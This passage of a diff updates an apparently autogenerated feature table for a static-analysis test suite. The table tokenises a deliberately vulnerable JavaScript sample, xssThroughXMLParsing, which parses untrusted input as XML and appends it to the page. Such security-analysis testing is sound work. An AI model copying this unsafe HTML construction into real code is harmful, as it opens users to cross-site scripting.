| fileImports | ./jquery-plugin ./typed markdown-it mermaid striptags | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:6:39:9:1 | functio ... ent);\\n} | assignedToPropName | xssThroughXMLParsing | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:6:39:9:1 | functio ... ent);\\n} | contextFunctionInterfaces | constructor(s)\ncreateHTML(x)\ncreatesClass(s)\ndoXss()\nguards(attrVal)\nintentionalTemplate(obj)\nplainDOMXMLParsing(s)\nsanitizedHTML(s)\ntypes(val)\nusesCreateHTML(x)\nusesCreateHTML(x)\nxssPlugin(options)\nxssThroughHTMLConstruction(s)\nxssThroughMarkdown(s)\nxssThroughMarkdown(s)\nxssThroughMoreComplexXMLParsing(s)\nxssThroughXMLParsing(s) | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:6:39:9:1 | functio ... ent);\\n} | contextSurroundingFunctionParameters | (s) | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:6:39:9:1 | functio ... ent);\\n} | fileImports | ./jquery-plugin ./typed markdown-it mermaid striptags | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:6:39:9:1 | return of anonymous function | contextFunctionInterfaces | constructor(s)\ncreateHTML(x)\ncreatesClass(s)\ndoXss()\nguards(attrVal)\nintentionalTemplate(obj)\nplainDOMXMLParsing(s)\nsanitizedHTML(s)\ntypes(val)\nusesCreateHTML(x)\nusesCreateHTML(x)\nxssPlugin(options)\nxssThroughHTMLConstruction(s)\nxssThroughMarkdown(s)\nxssThroughMarkdown(s)\nxssThroughMoreComplexXMLParsing(s)\nxssThroughXMLParsing(s) | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:6:39:9:1 | return of anonymous function | contextSurroundingFunctionParameters | | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:6:39:9:1 | return of anonymous function | enclosingFunctionBody | s doc DOMParser parseFromString s text/xml document querySelector #xml appendChild doc documentElement | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:6:39:9:1 | return of anonymous function | enclosingFunctionName | xssThroughXMLParsing | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:6:39:9:1 | return of anonymous function | fileImports | ./jquery-plugin ./typed markdown-it mermaid striptags | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:6:49:6:49 | s | contextFunctionInterfaces | constructor(s)\ncreateHTML(x)\ncreatesClass(s)\ndoXss()\nguards(attrVal)\nintentionalTemplate(obj)\nplainDOMXMLParsing(s)\nsanitizedHTML(s)\ntypes(val)\nusesCreateHTML(x)\nusesCreateHTML(x)\nxssPlugin(options)\nxssThroughHTMLConstruction(s)\nxssThroughMarkdown(s)\nxssThroughMarkdown(s)\nxssThroughMoreComplexXMLParsing(s)\nxssThroughXMLParsing(s) | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:6:49:6:49 | s | contextFunctionInterfaces | constructor(s)\ncreateHTML(x)\ncreatesClass(s)\ndoXss()\nguards(attrVal)\nintentionalTemplate(obj)\nplainDOMXMLParsing(s)\nsanitizedHTML(s)\ntypes(val)\nusesCreateHTML(x)\nusesCreateHTML(x)\nxssPlugin(options)\nxssThroughHTMLConstruction(s)\nxssThroughMarkdown(s)\nxssThroughMarkdown(s)\nxssThroughMoreComplexXMLParsing(s)\nxssThroughXMLParsing(s) | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:6:49:6:49 | s | contextSurroundingFunctionParameters | | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:6:49:6:49 | s | contextSurroundingFunctionParameters | (s) | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:6:49:6:49 | s | enclosingFunctionBody | s doc DOMParser parseFromString s text/xml document querySelector #xml appendChild doc documentElement | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:6:49:6:49 | s | enclosingFunctionBody | s doc DOMParser parseFromString s text/xml document querySelector #xml appendChild doc documentElement | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:6:49:6:49 | s | enclosingFunctionName | xssThroughXMLParsing | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:6:49:6:49 | s | enclosingFunctionName | xssThroughXMLParsing | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:6:49:6:49 | s | fileImports | ./jquery-plugin ./typed markdown-it mermaid striptags | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:6:49:6:49 | s | fileImports | ./jquery-plugin ./typed markdown-it mermaid striptags | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:7:11:7:13 | doc | contextFunctionInterfaces | constructor(s)\ncreateHTML(x)\ncreatesClass(s)\ndoXss()\nguards(attrVal)\nintentionalTemplate(obj)\nplainDOMXMLParsing(s)\nsanitizedHTML(s)\ntypes(val)\nusesCreateHTML(x)\nusesCreateHTML(x)\nxssPlugin(options)\nxssThroughHTMLConstruction(s)\nxssThroughMarkdown(s)\nxssThroughMarkdown(s)\nxssThroughMoreComplexXMLParsing(s)\nxssThroughXMLParsing(s) | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:7:11:7:13 | doc | contextSurroundingFunctionParameters | (s) | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:7:11:7:13 | doc | enclosingFunctionBody | s doc DOMParser parseFromString s text/xml document querySelector #xml appendChild doc documentElement | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:7:11:7:13 | doc | enclosingFunctionName | xssThroughXMLParsing | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:7:11:7:13 | doc | fileImports | ./jquery-plugin ./typed markdown-it mermaid striptags | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:7:11:7:62 | doc | contextFunctionInterfaces | constructor(s)\ncreateHTML(x)\ncreatesClass(s)\ndoXss()\nguards(attrVal)\nintentionalTemplate(obj)\nplainDOMXMLParsing(s)\nsanitizedHTML(s)\ntypes(val)\nusesCreateHTML(x)\nusesCreateHTML(x)\nxssPlugin(options)\nxssThroughHTMLConstruction(s)\nxssThroughMarkdown(s)\nxssThroughMarkdown(s)\nxssThroughMoreComplexXMLParsing(s)\nxssThroughXMLParsing(s) | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:7:11:7:62 | doc | contextSurroundingFunctionParameters | | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:7:11:7:62 | doc | enclosingFunctionBody | s doc DOMParser parseFromString s text/xml document querySelector #xml appendChild doc documentElement | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:7:11:7:62 | doc | enclosingFunctionName | xssThroughXMLParsing | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:7:11:7:62 | doc | fileImports | ./jquery-plugin ./typed markdown-it mermaid striptags | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:7:11:7:62 | doc = n ... t/xml") | contextFunctionInterfaces | constructor(s)\ncreateHTML(x)\ncreatesClass(s)\ndoXss()\nguards(attrVal)\nintentionalTemplate(obj)\nplainDOMXMLParsing(s)\nsanitizedHTML(s)\ntypes(val)\nusesCreateHTML(x)\nusesCreateHTML(x)\nxssPlugin(options)\nxssThroughHTMLConstruction(s)\nxssThroughMarkdown(s)\nxssThroughMarkdown(s)\nxssThroughMoreComplexXMLParsing(s)\nxssThroughXMLParsing(s) | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:7:11:7:62 | doc = n ... t/xml") | contextSurroundingFunctionParameters | (s) | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:7:11:7:62 | doc = n ... t/xml") | enclosingFunctionBody | s doc DOMParser parseFromString s text/xml document querySelector #xml appendChild doc documentElement | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:7:11:7:62 | doc = n ... t/xml") | enclosingFunctionName | xssThroughXMLParsing | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:7:11:7:62 | doc = n ... t/xml") | fileImports | ./jquery-plugin ./typed markdown-it mermaid striptags | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:7:17:7:31 | exceptional return of new DOMParser() | contextFunctionInterfaces | constructor(s)\ncreateHTML(x)\ncreatesClass(s)\ndoXss()\nguards(attrVal)\nintentionalTemplate(obj)\nplainDOMXMLParsing(s)\nsanitizedHTML(s)\ntypes(val)\nusesCreateHTML(x)\nusesCreateHTML(x)\nxssPlugin(options)\nxssThroughHTMLConstruction(s)\nxssThroughMarkdown(s)\nxssThroughMarkdown(s)\nxssThroughMoreComplexXMLParsing(s)\nxssThroughXMLParsing(s) | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:7:17:7:31 | exceptional return of new DOMParser() | contextSurroundingFunctionParameters | | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:7:17:7:31 | exceptional return of new DOMParser() | enclosingFunctionBody | s doc DOMParser parseFromString s text/xml document querySelector #xml appendChild doc documentElement | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:7:17:7:31 | exceptional return of new DOMParser() | enclosingFunctionName | xssThroughXMLParsing | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:7:17:7:31 | exceptional return of new DOMParser() | fileImports | ./jquery-plugin ./typed markdown-it mermaid striptags | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:7:17:7:31 | new DOMParser() | contextFunctionInterfaces | constructor(s)\ncreateHTML(x)\ncreatesClass(s)\ndoXss()\nguards(attrVal)\nintentionalTemplate(obj)\nplainDOMXMLParsing(s)\nsanitizedHTML(s)\ntypes(val)\nusesCreateHTML(x)\nusesCreateHTML(x)\nxssPlugin(options)\nxssThroughHTMLConstruction(s)\nxssThroughMarkdown(s)\nxssThroughMarkdown(s)\nxssThroughMoreComplexXMLParsing(s)\nxssThroughXMLParsing(s) | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:7:17:7:31 | new DOMParser() | contextSurroundingFunctionParameters | (s) | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:7:17:7:31 | new DOMParser() | enclosingFunctionBody | s doc DOMParser parseFromString s text/xml document querySelector #xml appendChild doc documentElement | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:7:17:7:31 | new DOMParser() | enclosingFunctionName | xssThroughXMLParsing | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:7:17:7:31 | new DOMParser() | fileImports | ./jquery-plugin ./typed markdown-it mermaid striptags | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:7:17:7:47 | new DOM ... mString | contextFunctionInterfaces | constructor(s)\ncreateHTML(x)\ncreatesClass(s)\ndoXss()\nguards(attrVal)\nintentionalTemplate(obj)\nplainDOMXMLParsing(s)\nsanitizedHTML(s)\ntypes(val)\nusesCreateHTML(x)\nusesCreateHTML(x)\nxssPlugin(options)\nxssThroughHTMLConstruction(s)\nxssThroughMarkdown(s)\nxssThroughMarkdown(s)\nxssThroughMoreComplexXMLParsing(s)\nxssThroughXMLParsing(s) | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:7:17:7:47 | new DOM ... mString | contextSurroundingFunctionParameters | (s) | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:7:17:7:47 | new DOM ... mString | enclosingFunctionBody | s doc DOMParser parseFromString s text/xml document querySelector #xml appendChild doc documentElement | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:7:17:7:47 | new DOM ... mString | enclosingFunctionName | xssThroughXMLParsing | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:7:17:7:47 | new DOM ... mString | fileImports | ./jquery-plugin ./typed markdown-it mermaid striptags | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:7:17:7:62 | exceptional return of new DOM ... t/xml") | contextFunctionInterfaces | constructor(s)\ncreateHTML(x)\ncreatesClass(s)\ndoXss()\nguards(attrVal)\nintentionalTemplate(obj)\nplainDOMXMLParsing(s)\nsanitizedHTML(s)\ntypes(val)\nusesCreateHTML(x)\nusesCreateHTML(x)\nxssPlugin(options)\nxssThroughHTMLConstruction(s)\nxssThroughMarkdown(s)\nxssThroughMarkdown(s)\nxssThroughMoreComplexXMLParsing(s)\nxssThroughXMLParsing(s) | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:7:17:7:62 | exceptional return of new DOM ... t/xml") | contextSurroundingFunctionParameters | | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:7:17:7:62 | exceptional return of new DOM ... t/xml") | enclosingFunctionBody | s doc DOMParser parseFromString s text/xml document querySelector #xml appendChild doc documentElement | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:7:17:7:62 | exceptional return of new DOM ... t/xml") | enclosingFunctionName | xssThroughXMLParsing | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:7:17:7:62 | exceptional return of new DOM ... t/xml") | fileImports | ./jquery-plugin ./typed markdown-it mermaid striptags | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:7:17:7:62 | new DOM ... t/xml") | contextFunctionInterfaces | constructor(s)\ncreateHTML(x)\ncreatesClass(s)\ndoXss()\nguards(attrVal)\nintentionalTemplate(obj)\nplainDOMXMLParsing(s)\nsanitizedHTML(s)\ntypes(val)\nusesCreateHTML(x)\nusesCreateHTML(x)\nxssPlugin(options)\nxssThroughHTMLConstruction(s)\nxssThroughMarkdown(s)\nxssThroughMarkdown(s)\nxssThroughMoreComplexXMLParsing(s)\nxssThroughXMLParsing(s) | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:7:17:7:62 | new DOM ... t/xml") | contextSurroundingFunctionParameters | (s) | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:7:17:7:62 | new DOM ... t/xml") | enclosingFunctionBody | s doc DOMParser parseFromString s text/xml document querySelector #xml appendChild doc documentElement | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:7:17:7:62 | new DOM ... t/xml") | enclosingFunctionName | xssThroughXMLParsing | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:7:17:7:62 | new DOM ... t/xml") | fileImports | ./jquery-plugin ./typed markdown-it mermaid striptags | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:7:21:7:29 | DOMParser | contextFunctionInterfaces | constructor(s)\ncreateHTML(x)\ncreatesClass(s)\ndoXss()\nguards(attrVal)\nintentionalTemplate(obj)\nplainDOMXMLParsing(s)\nsanitizedHTML(s)\ntypes(val)\nusesCreateHTML(x)\nusesCreateHTML(x)\nxssPlugin(options)\nxssThroughHTMLConstruction(s)\nxssThroughMarkdown(s)\nxssThroughMarkdown(s)\nxssThroughMoreComplexXMLParsing(s)\nxssThroughXMLParsing(s) | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:7:21:7:29 | DOMParser | contextSurroundingFunctionParameters | (s) | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:7:21:7:29 | DOMParser | enclosingFunctionBody | s doc DOMParser parseFromString s text/xml document querySelector #xml appendChild doc documentElement | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:7:21:7:29 | DOMParser | enclosingFunctionName | xssThroughXMLParsing | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:7:21:7:29 | DOMParser | fileImports | ./jquery-plugin ./typed markdown-it mermaid striptags | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:7:33:7:47 | parseFromString | contextFunctionInterfaces | constructor(s)\ncreateHTML(x)\ncreatesClass(s)\ndoXss()\nguards(attrVal)\nintentionalTemplate(obj)\nplainDOMXMLParsing(s)\nsanitizedHTML(s)\ntypes(val)\nusesCreateHTML(x)\nusesCreateHTML(x)\nxssPlugin(options)\nxssThroughHTMLConstruction(s)\nxssThroughMarkdown(s)\nxssThroughMarkdown(s)\nxssThroughMoreComplexXMLParsing(s)\nxssThroughXMLParsing(s) | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:7:33:7:47 | parseFromString | contextSurroundingFunctionParameters | (s) | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:7:33:7:47 | parseFromString | enclosingFunctionBody | s doc DOMParser parseFromString s text/xml document querySelector #xml appendChild doc documentElement | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:7:33:7:47 | parseFromString | enclosingFunctionName | xssThroughXMLParsing | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:7:33:7:47 | parseFromString | fileImports | ./jquery-plugin ./typed markdown-it mermaid striptags | | autogenerated/Xss/UnsafeHtmlConstruction/main.js:7:49:7:49 | s | CalleeFlexibleAccessPath | DOMParser().parseFromString | | autogenerated/Xss/UnsafeHtmlConstruction/main.js:7:49:7:49 | s | InputArgumentIndex | 0 | | autogenerated/Xss/UnsafeHtmlConstruction/main.js:7:49:7:49 | s | contextFunctionInterfaces | constructor(s)\ncreateHTML(x)\ncreatesClass(s)\ndoXss()\nguards(attrVal)\nintentionalTemplate(obj)\nplainDOMXMLParsing(s)\nsanitizedHTML(s)\ntypes(val)\nusesCreateHTML(x)\nusesCreateHTML(x)\nxssPlugin(options)\nxssThroughHTMLConstruction(s)\nxssThroughMarkdown(s)\nxssThroughMarkdown(s)\nxssThroughMoreComplexXMLParsing(s)\nxssThroughXMLParsing(s) | @@ -22825,6 +150806,46 @@ tokenFeatures | autogenerated/Xss/UnsafeHtmlConstruction/main.js:7:52:7:61 | "text/xml" | enclosingFunctionBody | s doc DOMParser parseFromString s text/xml document querySelector #xml appendChild doc documentElement | | autogenerated/Xss/UnsafeHtmlConstruction/main.js:7:52:7:61 | "text/xml" | enclosingFunctionName | xssThroughXMLParsing | | autogenerated/Xss/UnsafeHtmlConstruction/main.js:7:52:7:61 | "text/xml" | fileImports | ./jquery-plugin ./typed markdown-it mermaid striptags | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:8:5:8:12 | document | contextFunctionInterfaces | constructor(s)\ncreateHTML(x)\ncreatesClass(s)\ndoXss()\nguards(attrVal)\nintentionalTemplate(obj)\nplainDOMXMLParsing(s)\nsanitizedHTML(s)\ntypes(val)\nusesCreateHTML(x)\nusesCreateHTML(x)\nxssPlugin(options)\nxssThroughHTMLConstruction(s)\nxssThroughMarkdown(s)\nxssThroughMarkdown(s)\nxssThroughMoreComplexXMLParsing(s)\nxssThroughXMLParsing(s) | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:8:5:8:12 | document | contextSurroundingFunctionParameters | (s) | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:8:5:8:12 | document | enclosingFunctionBody | s doc DOMParser parseFromString s text/xml document querySelector #xml appendChild doc documentElement | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:8:5:8:12 | document | enclosingFunctionName | xssThroughXMLParsing | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:8:5:8:12 | document | fileImports | ./jquery-plugin ./typed markdown-it mermaid striptags | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:8:5:8:26 | documen ... elector | contextFunctionInterfaces | constructor(s)\ncreateHTML(x)\ncreatesClass(s)\ndoXss()\nguards(attrVal)\nintentionalTemplate(obj)\nplainDOMXMLParsing(s)\nsanitizedHTML(s)\ntypes(val)\nusesCreateHTML(x)\nusesCreateHTML(x)\nxssPlugin(options)\nxssThroughHTMLConstruction(s)\nxssThroughMarkdown(s)\nxssThroughMarkdown(s)\nxssThroughMoreComplexXMLParsing(s)\nxssThroughXMLParsing(s) | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:8:5:8:26 | documen ... elector | contextSurroundingFunctionParameters | (s) | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:8:5:8:26 | documen ... elector | enclosingFunctionBody | s doc DOMParser parseFromString s text/xml document querySelector #xml appendChild doc documentElement | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:8:5:8:26 | documen ... elector | enclosingFunctionName | xssThroughXMLParsing | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:8:5:8:26 | documen ... elector | fileImports | ./jquery-plugin ./typed markdown-it mermaid striptags | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:8:5:8:34 | documen ... "#xml") | contextFunctionInterfaces | constructor(s)\ncreateHTML(x)\ncreatesClass(s)\ndoXss()\nguards(attrVal)\nintentionalTemplate(obj)\nplainDOMXMLParsing(s)\nsanitizedHTML(s)\ntypes(val)\nusesCreateHTML(x)\nusesCreateHTML(x)\nxssPlugin(options)\nxssThroughHTMLConstruction(s)\nxssThroughMarkdown(s)\nxssThroughMarkdown(s)\nxssThroughMoreComplexXMLParsing(s)\nxssThroughXMLParsing(s) | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:8:5:8:34 | documen ... "#xml") | contextSurroundingFunctionParameters | (s) | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:8:5:8:34 | documen ... "#xml") | enclosingFunctionBody | s doc DOMParser parseFromString s text/xml document querySelector #xml appendChild doc documentElement | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:8:5:8:34 | documen ... "#xml") | enclosingFunctionName | xssThroughXMLParsing | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:8:5:8:34 | documen ... "#xml") | fileImports | ./jquery-plugin ./typed markdown-it mermaid striptags | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:8:5:8:34 | exceptional return of documen ... "#xml") | contextFunctionInterfaces | constructor(s)\ncreateHTML(x)\ncreatesClass(s)\ndoXss()\nguards(attrVal)\nintentionalTemplate(obj)\nplainDOMXMLParsing(s)\nsanitizedHTML(s)\ntypes(val)\nusesCreateHTML(x)\nusesCreateHTML(x)\nxssPlugin(options)\nxssThroughHTMLConstruction(s)\nxssThroughMarkdown(s)\nxssThroughMarkdown(s)\nxssThroughMoreComplexXMLParsing(s)\nxssThroughXMLParsing(s) | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:8:5:8:34 | exceptional return of documen ... "#xml") | contextSurroundingFunctionParameters | | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:8:5:8:34 | exceptional return of documen ... "#xml") | enclosingFunctionBody | s doc DOMParser parseFromString s text/xml document querySelector #xml appendChild doc documentElement | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:8:5:8:34 | exceptional return of documen ... "#xml") | enclosingFunctionName | xssThroughXMLParsing | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:8:5:8:34 | exceptional return of documen ... "#xml") | fileImports | ./jquery-plugin ./typed markdown-it mermaid striptags | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:8:5:8:46 | documen ... ndChild | contextFunctionInterfaces | constructor(s)\ncreateHTML(x)\ncreatesClass(s)\ndoXss()\nguards(attrVal)\nintentionalTemplate(obj)\nplainDOMXMLParsing(s)\nsanitizedHTML(s)\ntypes(val)\nusesCreateHTML(x)\nusesCreateHTML(x)\nxssPlugin(options)\nxssThroughHTMLConstruction(s)\nxssThroughMarkdown(s)\nxssThroughMarkdown(s)\nxssThroughMoreComplexXMLParsing(s)\nxssThroughXMLParsing(s) | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:8:5:8:46 | documen ... ndChild | contextSurroundingFunctionParameters | (s) | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:8:5:8:46 | documen ... ndChild | enclosingFunctionBody | s doc DOMParser parseFromString s text/xml document querySelector #xml appendChild doc documentElement | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:8:5:8:46 | documen ... ndChild | enclosingFunctionName | xssThroughXMLParsing | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:8:5:8:46 | documen ... ndChild | fileImports | ./jquery-plugin ./typed markdown-it mermaid striptags | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:8:5:8:67 | documen ... lement) | contextFunctionInterfaces | constructor(s)\ncreateHTML(x)\ncreatesClass(s)\ndoXss()\nguards(attrVal)\nintentionalTemplate(obj)\nplainDOMXMLParsing(s)\nsanitizedHTML(s)\ntypes(val)\nusesCreateHTML(x)\nusesCreateHTML(x)\nxssPlugin(options)\nxssThroughHTMLConstruction(s)\nxssThroughMarkdown(s)\nxssThroughMarkdown(s)\nxssThroughMoreComplexXMLParsing(s)\nxssThroughXMLParsing(s) | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:8:5:8:67 | documen ... lement) | contextSurroundingFunctionParameters | (s) | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:8:5:8:67 | documen ... lement) | enclosingFunctionBody | s doc DOMParser parseFromString s text/xml document querySelector #xml appendChild doc documentElement | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:8:5:8:67 | documen ... lement) | enclosingFunctionName | xssThroughXMLParsing | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:8:5:8:67 | documen ... lement) | fileImports | ./jquery-plugin ./typed markdown-it mermaid striptags | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:8:5:8:67 | exceptional return of documen ... lement) | contextFunctionInterfaces | constructor(s)\ncreateHTML(x)\ncreatesClass(s)\ndoXss()\nguards(attrVal)\nintentionalTemplate(obj)\nplainDOMXMLParsing(s)\nsanitizedHTML(s)\ntypes(val)\nusesCreateHTML(x)\nusesCreateHTML(x)\nxssPlugin(options)\nxssThroughHTMLConstruction(s)\nxssThroughMarkdown(s)\nxssThroughMarkdown(s)\nxssThroughMoreComplexXMLParsing(s)\nxssThroughXMLParsing(s) | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:8:5:8:67 | exceptional return of documen ... lement) | contextSurroundingFunctionParameters | | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:8:5:8:67 | exceptional return of documen ... lement) | enclosingFunctionBody | s doc DOMParser parseFromString s text/xml document querySelector #xml appendChild doc documentElement | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:8:5:8:67 | exceptional return of documen ... lement) | enclosingFunctionName | xssThroughXMLParsing | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:8:5:8:67 | exceptional return of documen ... lement) | fileImports | ./jquery-plugin ./typed markdown-it mermaid striptags | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:8:14:8:26 | querySelector | contextFunctionInterfaces | constructor(s)\ncreateHTML(x)\ncreatesClass(s)\ndoXss()\nguards(attrVal)\nintentionalTemplate(obj)\nplainDOMXMLParsing(s)\nsanitizedHTML(s)\ntypes(val)\nusesCreateHTML(x)\nusesCreateHTML(x)\nxssPlugin(options)\nxssThroughHTMLConstruction(s)\nxssThroughMarkdown(s)\nxssThroughMarkdown(s)\nxssThroughMoreComplexXMLParsing(s)\nxssThroughXMLParsing(s) | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:8:14:8:26 | querySelector | contextSurroundingFunctionParameters | (s) | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:8:14:8:26 | querySelector | enclosingFunctionBody | s doc DOMParser parseFromString s text/xml document querySelector #xml appendChild doc documentElement | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:8:14:8:26 | querySelector | enclosingFunctionName | xssThroughXMLParsing | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:8:14:8:26 | querySelector | fileImports | ./jquery-plugin ./typed markdown-it mermaid striptags | | autogenerated/Xss/UnsafeHtmlConstruction/main.js:8:28:8:33 | "#xml" | CalleeFlexibleAccessPath | document.querySelector | | autogenerated/Xss/UnsafeHtmlConstruction/main.js:8:28:8:33 | "#xml" | InputArgumentIndex | 0 | | autogenerated/Xss/UnsafeHtmlConstruction/main.js:8:28:8:33 | "#xml" | contextFunctionInterfaces | constructor(s)\ncreateHTML(x)\ncreatesClass(s)\ndoXss()\nguards(attrVal)\nintentionalTemplate(obj)\nplainDOMXMLParsing(s)\nsanitizedHTML(s)\ntypes(val)\nusesCreateHTML(x)\nusesCreateHTML(x)\nxssPlugin(options)\nxssThroughHTMLConstruction(s)\nxssThroughMarkdown(s)\nxssThroughMarkdown(s)\nxssThroughMoreComplexXMLParsing(s)\nxssThroughXMLParsing(s) | @@ -22833,6 +150854,16 @@ tokenFeatures | autogenerated/Xss/UnsafeHtmlConstruction/main.js:8:28:8:33 | "#xml" | enclosingFunctionName | xssThroughXMLParsing | | autogenerated/Xss/UnsafeHtmlConstruction/main.js:8:28:8:33 | "#xml" | fileImports | ./jquery-plugin ./typed markdown-it mermaid striptags | | autogenerated/Xss/UnsafeHtmlConstruction/main.js:8:28:8:33 | "#xml" | receiverName | document | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:8:36:8:46 | appendChild | contextFunctionInterfaces | constructor(s)\ncreateHTML(x)\ncreatesClass(s)\ndoXss()\nguards(attrVal)\nintentionalTemplate(obj)\nplainDOMXMLParsing(s)\nsanitizedHTML(s)\ntypes(val)\nusesCreateHTML(x)\nusesCreateHTML(x)\nxssPlugin(options)\nxssThroughHTMLConstruction(s)\nxssThroughMarkdown(s)\nxssThroughMarkdown(s)\nxssThroughMoreComplexXMLParsing(s)\nxssThroughXMLParsing(s) | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:8:36:8:46 | appendChild | contextSurroundingFunctionParameters | (s) | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:8:36:8:46 | appendChild | enclosingFunctionBody | s doc DOMParser parseFromString s text/xml document querySelector #xml appendChild doc documentElement | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:8:36:8:46 | appendChild | enclosingFunctionName | xssThroughXMLParsing | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:8:36:8:46 | appendChild | fileImports | ./jquery-plugin ./typed markdown-it mermaid striptags | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:8:48:8:50 | doc | contextFunctionInterfaces | constructor(s)\ncreateHTML(x)\ncreatesClass(s)\ndoXss()\nguards(attrVal)\nintentionalTemplate(obj)\nplainDOMXMLParsing(s)\nsanitizedHTML(s)\ntypes(val)\nusesCreateHTML(x)\nusesCreateHTML(x)\nxssPlugin(options)\nxssThroughHTMLConstruction(s)\nxssThroughMarkdown(s)\nxssThroughMarkdown(s)\nxssThroughMoreComplexXMLParsing(s)\nxssThroughXMLParsing(s) | +| 